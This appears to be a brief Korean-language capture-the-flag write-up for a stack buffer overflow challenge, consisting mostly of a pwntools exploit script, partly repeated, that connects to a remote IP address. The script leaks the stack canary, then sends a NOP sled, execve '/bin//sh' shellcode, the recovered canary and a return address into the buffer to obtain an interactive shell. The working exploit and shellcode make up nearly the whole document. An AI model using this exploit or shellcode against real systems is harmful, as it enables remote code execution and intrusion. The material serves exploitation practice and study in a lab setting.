Untitled

Untitled

버퍼 주소, RBP, Canary 주소까지 모두 알려준다.

이후 입력 부분이 buffer에 들어가는 걸 확인할 수 있다.

위 정보들을 활용하여

from pwn import *

p = remote("43.200.163.250", 31339)

context.log_level = "debug"
context.arch = "amd64"

def slog(name, addr): return success("{}: {}".format(name, hex(addr)))

#you can break me in 3min.
#buffer addr: 0x7ffdfba3e010
#rbp: 0x7ffdfba3e0a0
#canary addr: 0x7ffdfba3e098

p.recvuntil("buffer addr: ")
buffer_addr = int(p.recvline()[:-1], 16)

p.recvuntil("rbp: ")
rbp_addr = int(p.recvline()[:-1], 16)

p.recvuntil("canary addr: ")
canary_addr = int(p.recvline()[:-1], 16)

p.recvuntil("input: ")
shellcode =b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"

Canary_Address, Buffer_Address, RBP_Address

입력을 받아 해당 주소를 받는다.

위 정보들을 총합하여 Nop-Sled 공격기법을 활용하여 RIP주소를 조작하면 된다.

from pwn import *

p = remote("43.200.163.250", 31339)

context.log_level = "debug"
context.arch = "amd64"

def slog(name, addr): return success("{}: {}".format(name, hex(addr)))

#you can break me in 3min.
#buffer addr: 0x7ffdfba3e010
#rbp: 0x7ffdfba3e0a0
#canary addr: 0x7ffdfba3e098

p.recvuntil("buffer addr: ")
buffer_addr = int(p.recvline()[:-1], 16)

p.recvuntil("rbp: ")
rbp_addr = int(p.recvline()[:-1], 16)

p.recvuntil("canary addr: ")
canary_addr = int(p.recvline()[:-1], 16)

p.recvuntil("input: ")
shellcode =b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"

#Buffet2Canary Offset
offset = rbp_addr-buffer_addr
slog("offset : buffer <=> rbp", offset)

#LEAK_CANARY

leak_canary = b'A'*0x89

p.send(leak_canary)
p.recvuntil(leak_canary)
canary = u64(b'\x00'+p.recv(7))

print()
print("*"*30 + " Address " + "*"*30)
print()

slog("buffer_addr", buffer_addr)
slog("rbp_addr", rbp_addr)
slog("canary_addr", canary_addr)

print()
print("*"*30 + " Offset " + "*"*30)
print()

slog("rbp <=> buffer", rbp_addr-buffer_addr)
slog("Buffer <=> canary", canary_addr-buffer_addr)
slog("rbp <=> canary", rbp_addr-canary_addr)

print()
print("*"*30 + " Stack " + "*"*30)
print()

slog("canary", canary)

p.recvuntil("input: ")

#FINAL_PEXPLOIT

way = 0x88-len(shellcode)
print(hex(way))

payload = b'\x90'*(0x88-len(shellcode))
payload += shellcode
payload += p64(canary)
payload += b'\x90'*8
payload += p64(buffer_addr)

p.send(payload)
p.interactive()

Untitled